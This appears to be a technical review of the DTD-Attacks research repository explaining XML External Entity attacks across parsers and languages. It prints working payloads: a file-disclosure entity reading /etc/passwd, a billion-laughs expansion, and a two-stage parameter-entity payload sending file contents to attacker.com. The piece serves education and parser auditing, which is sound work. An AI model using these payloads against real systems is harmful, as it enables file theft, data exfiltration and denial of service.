Inside DTD-Attacks: A Cross-Language Framework for Testing XML Parser Vulnerabilities

Hook

A simple XML file can steal your /etc/passwd, trigger SSRF attacks, or crash your server—and most developers have no idea their parser allows it by default.

Context

XML External Entity (XXE) attacks have plagued web applications since the early 2000s and remained common enough that OWASP gave them a dedicated entry (A4) in its 2017 Top 10 before folding them into Security Misconfiguration in the 2021 edition. The core issue isn't that developers deliberately write insecure code; it's that many XML parsers ship, or long shipped, with dangerous defaults enabled. When a parser encounters an XML document with a Document Type Definition (DTD), it follows instructions that can reference external resources, expand nested entities exponentially, or access local files. Different programming languages handle these scenarios differently, creating a minefield of security gotchas.

The RUB-NDS/DTD-Attacks repository emerged from security research at Ruhr University Bochum's Network and Data Security group. Rather than publishing theoretical vulnerability descriptions, the researchers built a practical testing framework that demonstrates exactly how XXE attacks work across Java, Python, Ruby, PHP, .NET, and Perl. This cross-language approach reveals an uncomfortable truth: parsers that seem safe in one ecosystem might have catastrophic vulnerabilities in another. For security researchers, penetration testers, and developers auditing legacy XML code, this repository serves as both a reference implementation and a wake-up call.

Technical Insight

The DTD-Attacks framework is structured around attack vectors rather than programming languages. At its core, the repository contains malicious XML payloads organized by exploitation technique: external entity file disclosure, parameter entity abuse, nested entity expansion (the "billion laughs" attack), and SSRF through external DTD references. Each attack category includes variations tailored to expose weaknesses in specific parser implementations.

Consider the classic external entity file disclosure attack. A vulnerable parser processes this innocent-looking XML:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When the parser encounters &xxe;, it resolves the external entity by reading /etc/passwd and inserting its contents into the XML tree. The application then processes this data, perhaps echoing it back in an error message or writing it to logs, and the file contents leak. The DTD-Attacks repository includes dozens of variations: UTF-16 encoded payloads to bypass filters, parameter entity chains to exfiltrate data when direct entity expansion is blocked, and protocol handler exploits testing file://, http://, ftp://, and even Java's jar: scheme.
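For contrast, here is a minimal sketch of what a parser that does not resolve external entities does with the same document. It uses Python's standard-library ElementTree; the helper name try_parse is made up for illustration, and the exact error text may differ between Python versions.

```python
import xml.etree.ElementTree as ET

# The file-disclosure payload from above, unchanged.
PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>
"""


def try_parse(payload: bytes) -> str:
    """Parse the payload with ElementTree and describe what happened."""
    try:
        root = ET.fromstring(payload)
    except ET.ParseError as exc:
        # ElementTree does not fetch the external entity; it reports a parse error.
        return f"rejected: {exc}"
    return "parsed: " + ET.tostring(root, encoding="unicode")


outcome = try_parse(PAYLOAD)
print(outcome)
```

A vulnerable parser would instead return a tree whose data element contains the file's contents.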

The billion laughs attack demonstrates denial of service through nested entity expansion:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>

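Each level repeats the previous one ten times, so the output grows by a factor of ten per level. The abbreviated five-level document shown here expands to 10,000 copies of "lol", about 30 KB. The original nine-level version of the attack expands to a billion copies, roughly 3 GB, which is enough to exhaust memory on a parser with no expansion limit. The repository tests how different parsers handle entity expansion limits, or fail to impose them at all.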

What makes DTD-Attacks particularly valuable is its language-specific test harnesses. The Java tests examine DOM, SAX, and StAX parsers with different configurations. Python tests probe lxml, ElementTree, and the older minidom implementations. Each language directory contains both vulnerable example code and payloads crafted to exploit that language's parser quirks. For instance, Python's ElementTree does not resolve external entities and raises a parse error when it meets one (secure), whereas lxml before version 5.0 resolved them unless resolve_entities=False was passed (vulnerable). PHP's libxml2 binding historically resolved entities by default; libxml2 2.9.0 and later no longer load external entities unless asked to.
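The per-parser comparison can be sketched in a few lines for Python's standard-library parsers. This is not the repository's harness: the names classify, run_all, and PARSERS are hypothetical, lxml is left out because it is a third-party package, and a canary file in a temporary directory stands in for /etc/passwd so the check is harmless to run.

```python
import io
import pathlib
import tempfile
import xml.etree.ElementTree as ET
import xml.sax
import xml.sax.handler
from xml.dom import minidom

CANARY = "CANARY-7f3a"  # hypothetical marker standing in for sensitive file contents


def payload_for(uri: str) -> bytes:
    """File-disclosure payload whose external entity points at `uri`."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [\n  <!ENTITY xxe SYSTEM "{uri}">\n]>\n'
        "<root><data>&xxe;</data></root>\n"
    ).encode("utf-8")


def with_elementtree(payload: bytes) -> str:
    return ET.tostring(ET.fromstring(payload), encoding="unicode")


def with_minidom(payload: bytes) -> str:
    return minidom.parseString(payload).toxml()


class TextCollector(xml.sax.handler.ContentHandler):
    """Collects all character data the SAX parser reports."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def with_sax(payload: bytes) -> str:
    parser = xml.sax.make_parser()
    # Turn external entities off explicitly instead of trusting the default.
    parser.setFeature(xml.sax.handler.feature_external_ges, False)
    parser.setFeature(xml.sax.handler.feature_external_pes, False)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(payload))
    return "".join(collector.chunks)


PARSERS = {
    "ElementTree": with_elementtree,
    "minidom": with_minidom,
    "xml.sax": with_sax,
}


def classify(parse, payload: bytes) -> str:
    """Return 'rejected', 'leaked', or 'not expanded' for one parser."""
    try:
        output = parse(payload)
    except Exception:
        return "rejected"
    return "leaked" if CANARY in output else "not expanded"


def run_all() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp) / "secret.txt"
        secret.write_text(CANARY)
        payload = payload_for(secret.as_uri())
        return {name: classify(fn, payload) for name, fn in PARSERS.items()}


results = run_all()
for name, outcome in results.items():
    print(f"{name}: {outcome}")
```

Any parser reporting "leaked" has read the canary file. Adding another parser or configuration means adding one entry to PARSERS.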

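The repository also explores parameter entity attacks, which work around restrictions on general entities. Parameter entities (declared and referenced with % rather than &) exist only inside the DTD and are expanded while the DTD itself is being parsed. They help an attacker when a parser refuses external general entities but still processes external DTDs, or when the application never echoes parsed content back, because the stolen data can be sent out-of-band instead: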

<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<foo>&send;</foo>

The external evil.dtd file contains:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;

This two-stage attack reads the local file, embeds it in a URL parameter, and sends it to the attacker's server—all through DTD processing. The repository includes complete examples of these multi-stage attacks, demonstrating how attackers chain techniques when direct exploitation fails.
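The substitution at the heart of this attack can be traced with a toy simulation. The sketch below is plain string replacement, not a real DTD processor: the function expand_parameter_entities and the sample file contents are invented for illustration, and a real parser applies further rules (such as where parameter entity references are allowed) that are not modeled here.

```python
import re

# Matches a parameter entity reference such as %file;
PE_REF = re.compile(r"%([A-Za-z_][\w.-]*);")


def expand_parameter_entities(text: str, entities: dict) -> str:
    """Replace every %name; reference in `text` with its replacement text."""
    return PE_REF.sub(lambda m: entities[m.group(1)], text)


# Hypothetical stand-in for what %file; holds after the parser reads the local file.
file_contents = "root:x:0:0:root:/root:/bin/bash"

entities = {
    "file": file_contents,
    # Literal value of %all as written in evil.dtd.
    "all": "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>",
}

# Stage 1: when %all is declared, the %file; reference inside its value is expanded.
declared_all = expand_parameter_entities(entities["all"], entities)

# Stage 2: referencing %all; injects this declaration into the DTD, defining &send;.
print(declared_all)
# <!ENTITY send SYSTEM 'http://attacker.com/?data=root:x:0:0:root:/root:/bin/bash'>
```

When the document later references &send;, the parser requests that URL and the file contents arrive in the attacker's server log. In practice, files containing newlines or other characters that are not valid in a URL often break this request, which is one reason the technique has so many variants.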

Gotcha

The DTD-Attacks repository is a research artifact, not production security tooling, and that distinction creates significant limitations. First, there's no automated test runner that systematically executes all payloads against all parsers and generates a vulnerability report. You'll need to manually set up each language's environment, run individual test files, and interpret results yourself. The repository assumes you understand XXE attack mechanics and can modify payloads for your specific context—it's not a point-and-click vulnerability scanner.

Second, the project reflects parser behavior from 2015-2016 era research. Several parsers have since changed their defaults, especially after XXE attacks gained prominence in security advisories: libxml2 2.9.0 and later no longer load external entities unless asked to, and .NET's XmlReader prohibits DTD processing by default. Others have not: Java's DocumentBuilderFactory still resolves external entities unless you harden it explicitly, for example by disallowing DOCTYPE declarations. Using these payloads against current parser versions may therefore produce false negatives, suggesting security where careful configuration is still required, and a result recorded in the repository may no longer match what you observe. The repository is best used as a learning tool and payload reference rather than a definitive test of current parser security. Additionally, the lack of detailed documentation means you'll spend time reading source code to understand test setup and expected outcomes. This is a researcher's notebook, not a polished security product.

Verdict

Use DTD-Attacks if you're conducting security research on XML parser implementations, need educational examples to understand XXE attack mechanics across multiple languages, are performing penetration tests that call for language-specific XXE payloads, or are auditing legacy code that processes XML from untrusted sources. It excels as a reference collection of attack patterns and a comparative study of parser security postures. Skip it if you need an automated security scanner for CI/CD pipelines (consider a static analysis tool with XXE detection rules instead; a dependency scanner such as OWASP Dependency-Check flags known-vulnerable libraries, not parser configuration), want up-to-date testing against current parser versions (results will be unreliable), require production-ready mitigation code rather than exploitation examples, or lack the security expertise to interpret and adapt raw payloads. This is a specialist's toolkit for understanding XML attack surfaces, not a turnkey security solution.